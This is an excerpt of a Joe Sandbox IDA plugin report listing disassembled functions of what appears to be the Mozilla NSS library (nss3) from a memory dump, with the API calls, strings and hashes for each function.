                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 560490210-0
                                                                                                                                              • Opcode ID: 32299633f8eca085c42be54b2f198a190b0da80752dc318c7e0f56f60de401be
                                                                                                                                              • Instruction ID: 85ffb86e4a8d079149e3bdb1c2bc5c482a3bcc74e992cf13c40ee0c7c6fd9928
                                                                                                                                              • Opcode Fuzzy Hash: 32299633f8eca085c42be54b2f198a190b0da80752dc318c7e0f56f60de401be
                                                                                                                                              • Instruction Fuzzy Hash: F051D3B1E002019BDB119F35EE09AAB36B5BF0535CF584635E80A46A52FF32E535CBD2
                                                                                                                                              Function 6C6FACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 786543732-0
                                                                                                                                              • Opcode ID: ec12590d8857c3432f1921ab0a830840ffaec7084f27c893294b58596e71221e
                                                                                                                                              • Instruction ID: 9819b64d86a8ccad6c030d9dbe26925988d460203aa6c84b39096e2a22ce1e44
                                                                                                                                              • Opcode Fuzzy Hash: ec12590d8857c3432f1921ab0a830840ffaec7084f27c893294b58596e71221e
                                                                                                                                              • Instruction Fuzzy Hash: 5851C3B4E002168BDB10DF99D8466AE77B6BB0A34CF140135D825A3B13D371AD06CBEA
                                                                                                                                              Function 6C73ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C73ADE6
                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C73AE17
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C73AE29
                                                                                                                                                • Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C73AE3F
                                                                                                                                              • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C73AE78
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C73AE8A
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C73AEA0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                              • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
                                                                                                                                              • API String ID: 332880674-605059067
                                                                                                                                              • Opcode ID: a8bfbb1d8e2a04388e18069fa9c2519939b8a7efa823ad7ca2ed6462dfece388
                                                                                                                                              • Instruction ID: 27491b4ca3e66077a58e7e862756750522e8ec67d36226ee5658cbc8424217ee
                                                                                                                                              • Opcode Fuzzy Hash: a8bfbb1d8e2a04388e18069fa9c2519939b8a7efa823ad7ca2ed6462dfece388
                                                                                                                                              • Instruction Fuzzy Hash: 36312531605124ABCF21CB64DE4EFBA33B9AB4231DF446835E40D5BB42D738A848CBD6
                                                                                                                                              Function 6C7D4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • sqlite3_value_text16.NSS3(?), ref: 6C7D4CAF
                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C7D4CFD
                                                                                                                                              • sqlite3_value_text16.NSS3(?), ref: 6C7D4D44
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                              • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                              • API String ID: 2274617401-4033235608
                                                                                                                                              • Opcode ID: ef55f2b59338cbcdaf2c25fefae10570a3324d18bbe533ab07a05847be0ca237
                                                                                                                                              • Instruction ID: df5ef18c8c049368fcddab6ae664d2eaa2ba45aa3f2aa92fc59736dad66dd660
                                                                                                                                              • Opcode Fuzzy Hash: ef55f2b59338cbcdaf2c25fefae10570a3324d18bbe533ab07a05847be0ca237
                                                                                                                                              • Instruction Fuzzy Hash: E8316873A088216BDB244B24FB067A573617783318F570935D52C4BF65C724BC15E3D6
                                                                                                                                              Function 6C732DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LogPrint.NSS3(C_InitPIN), ref: 6C732DF6
                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C732E24
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C732E33
                                                                                                                                                • Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C732E49
                                                                                                                                              • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C732E68
                                                                                                                                              • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C732E81
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                              • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
                                                                                                                                              • API String ID: 1003633598-1777813432
                                                                                                                                              • Opcode ID: 9103849e3bb6cba8b148d89026c72c6b5954dc35cc73ee448d1eddaae3fd1de3
                                                                                                                                              • Instruction ID: 830e22771b79104f700b281a2ffbe3a03f0e05c1e49b5e5ee53d48d9b64de1b3
                                                                                                                                              • Opcode Fuzzy Hash: 9103849e3bb6cba8b148d89026c72c6b5954dc35cc73ee448d1eddaae3fd1de3
                                                                                                                                              • Instruction Fuzzy Hash: 8A313771606164ABDB20CB15CF4DB6A37B9EB4231CF045470E80DABB53DB38A848CBD6
                                                                                                                                              Function 6C7D2D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • sqlite3_initialize.NSS3 ref: 6C7D2D9F
                                                                                                                                                • Part of subcall function 6C68CA30: EnterCriticalSection.KERNEL32(?,?,?,6C6EF9C9,?,6C6EF4DA,6C6EF9C9,?,?,6C6B369A), ref: 6C68CA7A
                                                                                                                                                • Part of subcall function 6C68CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C68CB26
                                                                                                                                              • sqlite3_exec.NSS3(?,?,6C7D2F70,?,?), ref: 6C7D2DF9
                                                                                                                                              • sqlite3_free.NSS3(00000000), ref: 6C7D2E2C
                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C7D2E3A
                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C7D2E52
                                                                                                                                              • sqlite3_mprintf.NSS3(6C83AAF9,?), ref: 6C7D2E62
                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C7D2E70
                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C7D2E89
                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C7D2EBB
                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C7D2ECB
                                                                                                                                              • sqlite3_free.NSS3(00000000), ref: 6C7D2F3E
                                                                                                                                              • sqlite3_free.NSS3(?), ref: 6C7D2F4C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1957633107-0
                                                                                                                                              • Opcode ID: 2dfd81bb95f7861e55db35b379a145f56cb94c05a622332f37e9d55091a12fdc
                                                                                                                                              • Instruction ID: 17cfcd32db8ea84a50e7038dbec8f6f4cf6280e68920235998e521a72009eaba
                                                                                                                                              • Opcode Fuzzy Hash: 2dfd81bb95f7861e55db35b379a145f56cb94c05a622332f37e9d55091a12fdc
                                                                                                                                              • Instruction Fuzzy Hash: DD619FB5E052069BEB00CF68D989B9EBBB5AF49348F160034DC45A7701E735FC46CBA5
                                                                                                                                              Function 6C717C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_CallOnce.NSS3(6C862120,Function_00097E60,00000000,?,?,?,?,6C79067D,6C791C60,00000000), ref: 6C717C81
                                                                                                                                                • Part of subcall function 6C684C70: TlsGetValue.KERNEL32(?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684C97
                                                                                                                                                • Part of subcall function 6C684C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CB0
                                                                                                                                                • Part of subcall function 6C684C70: PR_Unlock.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CC9
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C717CA0
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C717CB4
                                                                                                                                              • PR_Unlock.NSS3 ref: 6C717CCF
                                                                                                                                                • Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
                                                                                                                                                • Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C717D04
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C717D1B
                                                                                                                                              • realloc.MOZGLUE(-00000050), ref: 6C717D82
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C717DF4
                                                                                                                                              • PR_Unlock.NSS3 ref: 6C717E0E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2305085145-0
                                                                                                                                              • Opcode ID: 042737fcf677e2598f9ef8874a53c34aed998e4977a4669e71269a1cdda90708
                                                                                                                                              • Instruction ID: 055f874cf1c0d6ccdcfe7bb19a4c43ff672a5e565d3dbb87a97d661c097965ec
                                                                                                                                              • Opcode Fuzzy Hash: 042737fcf677e2598f9ef8874a53c34aed998e4977a4669e71269a1cdda90708
                                                                                                                                              • Instruction Fuzzy Hash: F4512371A0C1049FDB215F29CE4AA7537B5FB0231CF1941BAED4487B62EB30E865CAC1
                                                                                                                                              Function 6C684C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684C97
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CB0
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CC9
                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684D11
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684D2A
                                                                                                                                              • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684D4A
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684D57
                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684D97
                                                                                                                                              • PR_Lock.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684DBA
                                                                                                                                              • PR_WaitCondVar.NSS3 ref: 6C684DD4
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684DE6
                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684DEF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3388019835-0
                                                                                                                                              • Opcode ID: 224b6976bdba805b25e2ec61be61419c950873ee0cc85a5549816226993b9e6f
                                                                                                                                              • Instruction ID: 871c29196e622a4c04161c6f1f5387901abddff3fda0d4b41ca3c12f0a23cbad
                                                                                                                                              • Opcode Fuzzy Hash: 224b6976bdba805b25e2ec61be61419c950873ee0cc85a5549816226993b9e6f
                                                                                                                                              • Instruction Fuzzy Hash: 9A41C0B5A09611CFCB10AF79C0981697BF8BF0A318F055679DC889B711EB70D881CBDA
                                                                                                                                              Function 6C817CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6C817CE0
                                                                                                                                                • Part of subcall function 6C7C9BF0: TlsGetValue.KERNEL32(?,?,?,6C810A75), ref: 6C7C9C07
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C817D36
                                                                                                                                              • PR_Realloc.NSS3(?,00000080), ref: 6C817D6D
                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6C817D8B
                                                                                                                                              • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C817DC2
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C817DD8
                                                                                                                                              • malloc.MOZGLUE(00000080), ref: 6C817DF8
                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6C817E06
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                                                                                              • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                                                                              • API String ID: 530461531-3274975309
                                                                                                                                              • Opcode ID: 6452ceb26844328edfbd0e0c0a5d19ec5c6c7f6d64be91328a5e74eb14ef8838
                                                                                                                                              • Instruction ID: 52a30f3625c822e467a1f4727a9bc33763aa8794a39dc418ba80890e7ebe65da
                                                                                                                                              • Opcode Fuzzy Hash: 6452ceb26844328edfbd0e0c0a5d19ec5c6c7f6d64be91328a5e74eb14ef8838
                                                                                                                                              • Instruction Fuzzy Hash: D341D6B161420A9FDB14CF28CE84D6B37E6FF85318B25496CE8198BF51D731E801CBA1
                                                                                                                                              Function 6C724E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C724E90
                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 6C724EA9
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C724EC6
                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 6C724EDF
                                                                                                                                              • PL_HashTableLookup.NSS3 ref: 6C724EF8
                                                                                                                                              • PR_Unlock.NSS3 ref: 6C724F05
                                                                                                                                              • PR_Now.NSS3 ref: 6C724F13
                                                                                                                                              • PR_Unlock.NSS3 ref: 6C724F3A
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
                                                                                                                                                • Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
                                                                                                                                                • Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                                                              • String ID: bUrl$bUrl
                                                                                                                                              • API String ID: 326028414-462365213
                                                                                                                                              • Opcode ID: ee6a911a6e3d8d823119712561e11c1e41660212d66f4c30c1cc7034a5801577
                                                                                                                                              • Instruction ID: 8f99d4792ed39a23dc0c318ef29647433782ebdda077b6c8892a977cf55d1246
                                                                                                                                              • Opcode Fuzzy Hash: ee6a911a6e3d8d823119712561e11c1e41660212d66f4c30c1cc7034a5801577
                                                                                                                                              • Instruction Fuzzy Hash: DA4168B4A00605DFCB10EF68C5848AABBF4FF49318B058669EC599B711EB34E885CFD1
                                                                                                                                              Function 6C74ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C74DE64), ref: 6C74ED0C
                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C74ED22
                                                                                                                                                • Part of subcall function 6C75B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8318D0,?), ref: 6C75B095
                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6C74ED4A
                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6C74ED6B
                                                                                                                                              • PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C74ED38
                                                                                                                                                • Part of subcall function 6C684C70: TlsGetValue.KERNEL32(?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684C97
                                                                                                                                                • Part of subcall function 6C684C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CB0
                                                                                                                                                • Part of subcall function 6C684C70: PR_Unlock.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CC9
                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6C74ED52
                                                                                                                                              • PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C74ED83
                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6C74ED95
                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6C74ED9D
                                                                                                                                                • Part of subcall function 6C7664F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C76127C,00000000,00000000,00000000), ref: 6C76650E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
